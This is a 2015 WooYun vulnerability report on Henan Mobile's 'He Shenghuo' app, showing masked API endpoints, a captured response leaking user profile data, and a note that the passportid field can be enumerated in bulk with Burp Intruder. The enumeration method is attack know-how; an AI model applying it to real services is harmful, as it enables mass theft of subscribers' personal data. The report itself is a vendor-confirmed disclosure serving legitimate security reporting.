当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0145678

漏洞标题:河南移动和生活某漏洞可导致用户信息泄露

相关厂商:河南移动

漏洞作者: 路人甲

提交时间:2015-10-10 11:54

修复时间:2015-11-28 17:14

公开时间:2015-11-28 17:14

漏洞类型:设计缺陷/逻辑错误

危害等级:低

自评Rank:1

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-10: 细节已通知厂商并且等待厂商处理中
2015-10-14: 厂商已经确认,细节仅向厂商公开
2015-10-24: 细节向核心白帽子及相关领域专家公开
2015-11-03: 细节向普通白帽子公开
2015-11-13: 细节向实习白帽子公开
2015-11-28: 细节向公众公开

简要描述:

用户信息泄漏,可批量

详细说明:

手机代理通过brup上网,登陆"和生活"-通讯账单

**.**.**.**/3g/3/life/CommunicationBill/index.jsonp?callback=jQuery110208061564099043608_1444407841376&msisdn=1350766****&_=1444407841377

话费使用情况

**.**.**.**/3g/3/life/CommunicationBill/getBusiness.jsonp?callback=jQuery110208061564099043608_1444407841376&msisdn=1350766****&_=1444407841378

订购信息
点个人资料

HTTP/1.1 200 OK
Date: Fri, 09 Oct 2015 16:20:12 GMT
msgversion: 1.0.0
transactionid: 20040
sendareacode: 000001
sendaddress: 99030000
recvareacode: 000002
recvaddress: 00010
Content-Type: text/html;charset=UTF-8
Server: Jetty(7.6.3.v20120416)
Content-Length: 1402
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<root>
<msgname>getuserinforesp</msgname>
<transactionid>20040</transactionid>
<timestamp>20151010003022</timestamp>
<result>001000</result>
<resultdesc>success</resultdesc>
<body>
<userinfo>
<passportid>A201301120019908****</passportid>
<mobnum>1350766****</mobnum>
<mail>*****@**.**.**.**</mail>
<username></username>
<userclass>0</userclass>
<eccode></eccode>
<areacode>411700</areacode>
<name></name>
<sex>0</sex>
<birthday></birthday>
<address></address>
<postcode></postcode>
<userlogolist/>
<interests></interests>
<profession></profession>
<idcard></idcard>
<married>0</married>
<havechildren>0</havechildren>
<salary></salary>
<school></school>
<nationality></nationality>
<folk></folk>
<polity></polity>
<faith></faith>
<emailstatus>0</emailstatus>
<phonestatus>0</phonestatus>
<userstatus>0</userstatus>
<extensioninfos/>
<agreementstatus>1</agreementstatus>
<memberorderstatus>0</memberorderstatus>
</userinfo>
</body>
</root>


提交到brup的intruder

无标题.jpg


<passportid>A201301120019908$****$</passportid> 关键就是这个
字典自己生成,然后开始跑吧

漏洞证明:

1.jpg


2.jpg

修复方案:

自己想办法

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:9

确认时间:2015-10-14 17:13

厂商回复:


CNVD确认并复现所述情况,已经转由CNCERT向中国移动集团公司通报,由其后续协调网站管理部门处置。

最新状态:

暂无